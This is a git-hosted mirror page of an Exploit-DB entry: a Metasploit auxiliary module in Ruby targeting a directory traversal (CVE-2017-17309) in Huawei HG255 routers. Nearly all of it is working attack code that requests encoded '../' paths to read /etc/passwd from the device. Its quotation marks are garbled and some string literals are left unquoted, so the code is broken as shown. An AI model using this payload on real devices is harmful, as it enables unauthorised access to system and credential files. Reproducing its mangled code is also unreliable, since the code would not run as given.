bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions
exploit-db-mirror/exploits/hardware/webapps/47923.rb
Offensive Security 36c084c351 DB: 2021-09-03 
45419 changes to exploits/shellcodes

2 new exploits/shellcodes

Too many to list!
2021-09-03 13:39:06 +00:00

57 lines
No EOL
1.8 KiB
Ruby
Executable file
Raw Permalink Blame History

This file contains ambiguous Unicode characters

This file contains Unicode characters that might be confused with other characters. If you think that this is intentional, you can safely ignore this warning. Use the Escape button to reveal them.

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# web site for more information on licensing and terms of use.
#
##
class MetasploitModule < Msf::Auxiliary
include Msf::Exploit::Remote::HttpClient
def initialize
super(
'Name' => 'Huawei HG255 Directory Traversal',
Description => Server Directory Traversal at Huawei HG255 by malicious GET requests,
Author => Ismail Tasdelen,
License => MSF_LICENSE,
References =>
[
['CVE', '2017-17309' ],
['URL', 'https://www.huawei.com/en/psirt/security-notices/huawei-sn-20170911-01-hg255s-en']
]
)
register_options(
[
Opt::RPORT(80)
], self.class
)
end
def run
urllist=[
/js/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc/passwd,
/lib/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc/passwd,
/res/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc/passwd,
/css/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc/passwd]
urllist.each do |url|
begin
res = send_request_raw(
{
method=> GET,
uri=> url
})
if res
print_good(Vulnerable! for #{url}”)
else
print_status(Vulnerable(no response) detected for #{url}”)
end
rescue Errno::ECONNRESET
print_status(Vulnerable(rst) detected for #{url}”)
rescue Exception
print_error(Connection failed.)
end
end
end
Reference in a new issue View git blame Copy permalink